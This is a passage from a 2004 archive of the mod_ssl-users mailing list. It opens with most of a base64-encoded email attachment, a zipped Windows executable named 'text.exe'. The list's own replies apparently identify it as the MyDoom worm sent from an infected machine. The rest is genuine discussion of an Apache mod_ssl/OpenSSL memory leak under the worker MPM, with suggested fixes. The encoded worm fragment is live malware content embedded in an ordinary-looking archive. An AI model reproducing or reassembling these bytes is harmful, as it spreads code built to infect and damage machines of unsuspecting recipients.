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
AAAAAAAAAAAAAQAJBAAAUAAAAKjAAAAoAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAoAAAgHgA
AIAAAAAAAAAAAAAAAAAAAAEACQQAAJAAAADUwQAAFAAAAAAAAAAAAAAAAQAwALCQAAAoAAAAEAAA
ACAAAAABAAQAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAAAACAAIAA
gIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAiIiIAAAAAAiHd3d4gAAA
eP//iIdwAAB494///3gAAHj/////eAAAePd3eP94AAB4/////3gAAHj3d3j/eAAAeP////94AAB4
93eP/3gAAHj/////eAAAeP////94AAB4f39/f3gAAIdzh4eHgAAAB7M7e3eAAAAAAAAAgAAA8D8A
AOAHAADABwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMAAMAHAADgBwAA
/98AANiRAAAAAAEAAQAQEBAAAQAEACgBAAABAAAAAAAAAAAAAAAAAJDCAABgwgAAAAAAAAAAAAAA
AAAAncIAAHDCAAAAAAAAAAAAAAAAAACqwgAAeMIAAAAAAAAAAAAAAAAAALXCAACAwgAAAAAAAAAA
AAAAAAAAwMIAAIjCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMrCAADYwgAA6MIAAAAAAAD2wgAAAAAA
AATDAAAAAAAADMMAAAAAAABzAACAAAAAAEtFUk5FTDMyLkRMTABBRFZBUEkzMi5kbGwATVNWQ1JU
LmRsbABVU0VSMzIuZGxsAFdTMl8zMi5kbGwAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MA
AEV4aXRQcm9jZXNzAAAAUmVnQ2xvc2VLZXkAAABtZW1zZXQAAHdzcHJpbnRmQQAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEsBAhQA
CgAAAAAASww9MMonH54AWAAAAFgAAAgAAAAAAAAAAAAgAAAAAAAAAHRleHQuZXhlUEsFBgAAAAAB
AAEANgAAACZYAAAAAA==

------=_NextPart_000_0014_A5BFD337.50D5C4C5--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 29 16:17:16 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 322A9A8963; Thu, 29 Jan 2004 16:17:16 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from indigo.quadrant.net (indigo.quadrant.net [207.195.92.9])
	by master.modssl.org (Postfix) with ESMTP id 62BF1A8946
	for ; Thu, 29 Jan 2004 16:16:58 +0100 (CET)
Received: from [192.168.100.122] (production.marketingden.com [204.83.38.3])
	by indigo.quadrant.net (8.12.10/8.12.10) with ESMTP id i0TFGpSf022293
	for ; Thu, 29 Jan 2004 09:16:56 -0600 (CST)
User-Agent: Microsoft-Entourage/9.0.2.4011
Date: Thu, 29 Jan 2004 09:16:51 -0600
Subject: Re: Server Report
From: James Hastings-Trew 
To: 
Message-ID: 
In-Reply-To: <200401290134.i0T1YTH26063@iilcorp.com>
Mime-version: 1.0
Content-type: text/plain; charset="US-ASCII"
Content-transfer-encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Hastings-Trew 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

MyDoom on the mailing list now? Fantastic.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 29 17:23:22 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 47A9FA8958; Thu, 29 Jan 2004 17:23:22 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.193])
	by master.modssl.org (Postfix) with ESMTP id 3B313A8934
	for ; Thu, 29 Jan 2004 17:23:06 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [10.254.1.122])
	by maggotts.rnib.org.uk (8.12.8/8.12.8) with ESMTP id i0TGMWhS017206
	for ; Thu, 29 Jan 2004 16:22:49 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2657.72)
	id ; Thu, 29 Jan 2004 16:22:32 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F05ADDBDC@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: Server Report
Date: Thu, 29 Jan 2004 16:22:31 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, but it didn't come from Ralf. Check the headers. Someone who has a
message from this list at some time somewhere on their hard disk is
infected. It's even possible that they've never been subscribed (eg they
just looked at the archives). 

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Even if you win the rat race, that will still only make you a rat.


> -----Original Message-----
> From: James Hastings-Trew [mailto:james@marketingden.com]
> Sent: 29 January 2004 15:17
> To: modssl-users@modssl.org
> Subject: Re: Server Report
> 
> 
> MyDoom on the mailing list now? Fantastic.
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 
DISCLAIMER: 

NOTICE: The information contained in this email and any attachments is 
confidential and may be privileged. If you are not the intended 
recipient you should not use, disclose, distribute or copy any of the 
content of it or of any attachment; you are requested to notify the 
sender immediately of your receipt of the email and then to delete it 
and any attachments from your system. 

RNIB endeavours to ensure that emails and any attachments generated by 
its staff are free from viruses or other contaminants. However, it 
cannot accept any responsibility for any  such which are transmitted.
We therefore recommend you scan all attachments. 

Please note that the statements and views expressed in this email and 
any attachments are those of the author and do not necessarily represent 
those of RNIB. 

RNIB Registered Charity Number: 226227 

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 30 18:03:07 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D18E7A8940; Fri, 30 Jan 2004 18:03:07 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ztxmail05.ztx.compaq.com (ztxmail05.ztx.compaq.com [161.114.1.209])
	by master.modssl.org (Postfix) with ESMTP id 43CB9A8937
	for ; Fri, 30 Jan 2004 18:03:04 +0100 (CET)
Received: from cceexg11.americas.cpqcorp.net (cceexg11.americas.cpqcorp.net [16.81.1.28])
	by ztxmail05.ztx.compaq.com (Postfix) with ESMTP id 1DB73DD0A
	for ; Fri, 30 Jan 2004 11:03:03 -0600 (CST)
Received: from cceexc23.americas.cpqcorp.net ([16.110.250.2]) by cceexg11.americas.cpqcorp.net with Microsoft SMTPSVC(6.0.3790.0);
	 Fri, 30 Jan 2004 11:02:34 -0600
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C3E752.CA1743A6"
Subject: There appears to be a major memory leak in mod_ssl/OpenSSL
Date: Fri, 30 Jan 2004 11:02:06 -0600
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: There appears to be a major memory leak in mod_ssl/OpenSSL
Thread-Index: AcPnUsoVCcFw7vnNSue9yrihizC/xg==
From: "Avery, Ken" 
To: 
X-OriginalArrivalTime: 30 Jan 2004 17:02:34.0685 (UTC) FILETIME=[DB2AB6D0:01C3E752]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Avery, Ken" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C3E752.CA1743A6
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I have been tracking this down for a couple of weeks and thought it was
in the code my company is developing and it appears that is not the
case. In order to eliminate our code from the mix and isolate the
problem here is what I did:
This was done on Windows and Linux:=20
1. Download the latest Apache from www.apache.org.=20
2. Download the latest OpenSSL from www.openssl.org.=20
3. Build them both, with apache add the mod_ssl option and also for
Linux use the MPM worker module.=20
4. Install and modify the ssl.conf file ServerName value.=20
5. Run Apache (httpd)=20
6a. Run the Performance monitor on Windows and look at Private Bytes for
the second Apache process.=20
6b. On Linux run top -p pid(httpd1) -p pid(http2) ..... -p pid(httpN)
watching the size of the processes=20
7. Set you browser to not cache requests and check for a new page every
time.=20
8. Start fetching a page from https://localhost and keep refreshing the
page.=20
So far 3 other engineers have reproduced this test because they did not
believe the problem could be in Apache mod_ssl/OpenSSL, they all
verified that it leaks like a sieve.
We were all trying to figure out why no one else has complained about
such a huge leak so we ran another test. We tried using the prefork MPM
and it turns out that worked fine. Based on the results it appears the
OS is cleaning up memory for the prefork module and the threaded model
never gets its memory freed. I have used a debugger on Windows and set
break points on the CRYPTO_malloc and CRYPTO_free functions and have
seen gobs of memory CRYPTO_malloc(ed) and not one time have I seen
CRYPTO_free called. I was not sure if having the OS cleanup memory was
part of the design (if indeed that is what is happening) or if there is
potentially a problem in the OpenSSL memory management code.
With all this said, I am by no means an expert on this code and could
really use some help understanding what is going on here?
Any and all help is appreciated,=20
Ken=20


------_=_NextPart_001_01C3E752.CA1743A6
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






There appears to be a major memory leak in =
mod_ssl/OpenSSL





I have been tracking this down for a =
couple of weeks and thought it was in the code my company is developing =
and it appears that is not the case. In order to eliminate our code from =
the mix and isolate the problem here is what I did:



This was done on Windows and =
Linux:

1. Download the latest Apache =
from www.apache.org.

2. Download the latest OpenSSL =
from www.openssl.org.

3. Build them both, with apache add =
the mod_ssl option and also for Linux use the MPM worker =
module.

4. Install and modify the ssl.conf =
file ServerName value.

5. Run Apache (httpd)

6a. Run the Performance monitor on =
Windows and look at Private Bytes for the second Apache =
process.

6b. On Linux run top -p pid(httpd1) =
-p pid(http2) ….. -p pid(httpN) watching the size of the =
processes

7. Set you browser to not cache =
requests and check for a new page every time.

8. Start fetching a page from =
https://localhost and keep refreshing the page. 


So far 3 other engineers have =
reproduced this test because they did not believe the problem could be =
in Apache mod_ssl/OpenSSL, they all verified that it leaks like a =
sieve.



We were all trying to figure out why no =
one else has complained about such a huge leak so we ran another test. =
We tried using the prefork MPM and it turns out that worked fine. Based =
on the results it appears the OS is cleaning up memory for the prefork =
module and the threaded model never gets its memory freed. I have used a =
debugger on Windows and set break points on the CRYPTO_malloc and =
CRYPTO_free functions and have seen gobs of memory CRYPTO_malloc(ed) and =
not one time have I seen CRYPTO_free called. I was not sure if having =
the OS cleanup memory was part of the design (if indeed that is what is =
happening) or if there is potentially a problem in the OpenSSL memory =
management code.



With all this said, I am by no means an =
expert on this code and could really use some help understanding what is =
going on here?



Any and all help is =
appreciated,

Ken 





------_=_NextPart_001_01C3E752.CA1743A6--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 30 18:13:20 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 799CAA8963; Fri, 30 Jan 2004 18:13:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 6AC9AA8937
	for ; Fri, 30 Jan 2004 18:13:05 +0100 (CET)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.11.6/8.11.6) with ESMTP id i0UHD4b25814;
	Fri, 30 Jan 2004 12:13:04 -0500
Received: from radish.cambridge.redhat.com (radish.cambridge.redhat.com [172.16.18.90])
	by int-mx1.corp.redhat.com (8.11.6/8.11.6) with ESMTP id i0UHD3a16921;
	Fri, 30 Jan 2004 12:13:03 -0500
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.10/8.12.7) with ESMTP id i0UHD1AO008469;
	Fri, 30 Jan 2004 17:13:01 GMT
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.10/8.12.10/Submit) id i0UHD0uv008468;
	Fri, 30 Jan 2004 17:13:00 GMT
Date: Fri, 30 Jan 2004 17:13:00 +0000
From: Joe Orton 
To: "Avery, Ken" 
Cc: modssl-users@modssl.org
Subject: Re: There appears to be a major memory leak in mod_ssl/OpenSSL
Message-ID: <20040130171300.GA17982@redhat.com>
Mail-Followup-To: "Avery, Ken" ,
	modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jan 30, 2004 at 11:02:06AM -0600, Avery, Ken wrote:
> I have been tracking this down for a couple of weeks and thought it was
> in the code my company is developing and it appears that is not the
> case. In order to eliminate our code from the mix and isolate the
> problem here is what I did:
> This was done on Windows and Linux: 
> 1. Download the latest Apache from www.apache.org. 
> 2. Download the latest OpenSSL from www.openssl.org. 
> 3. Build them both, with apache add the mod_ssl option and also for
> Linux use the MPM worker module. 

Are you using 2.0.48?  Could be one of these two bugs:

http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25667
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25659

Try using the 'shmcb' session cache instead of dbm.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan 30 18:22:29 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 637CFA8940; Fri, 30 Jan 2004 18:22:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mwinf0602.wanadoo.fr (smtp6.wanadoo.fr [193.252.22.25])
	by master.modssl.org (Postfix) with ESMTP id 239DDA8934
	for ; Fri, 30 Jan 2004 18:22:26 +0100 (CET)
Received: from adrien (ABoulogne-111-1-2-186.w80-14.abo.wanadoo.fr [80.14.217.186])
	by mwinf0602.wanadoo.fr (SMTP Server) with SMTP id 55AF4540017F
	for ; Fri, 30 Jan 2004 18:22:25 +0100 (CET)
Message-ID: <006b01c3e755$bf3517b0$010c010a@adrien>
From: "Adrien Felon" 
To: 
References: 
Subject: Re: There appears to be a major memory leak in mod_ssl/OpenSSL
Date: Fri, 30 Jan 2004 18:23:15 +0100
Organization: NexGen Software
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1158
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Adrien Felon" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There appears to be a major memory leak in mod_ssl/OpenSSLHello,

I encountered many memory leak trouble with OpenSSL. I used quite old
versions (from 0.9.6c), so I don't know if this is relevant or not for
you... Anyway I figured out that nobody seemed to ever call the
CRYPTO_thread_cleanup(). I just added a call to that function, and the
memory heap became clean. I hope the solution will be that simple in your
case.

The OpenSSL code did not look robust to me on that matter... But I think
that OpenSSL people are trying to (or did) improve the cleanup code.

Adrien

----- Original Message ----- 
From: Avery, Ken
To: modssl-users@modssl.org
Sent: Friday, January 30, 2004 6:02 PM
Subject: There appears to be a major memory leak in mod_ssl/OpenSSL


I have been tracking this down for a couple of weeks and thought it was in
the code my company is developing and it appears that is not the case. In
order to eliminate our code from the mix and isolate the problem here is
what I did:
This was done on Windows and Linux:
1. Download the latest Apache from www.apache.org.
2. Download the latest OpenSSL from www.openssl.org.
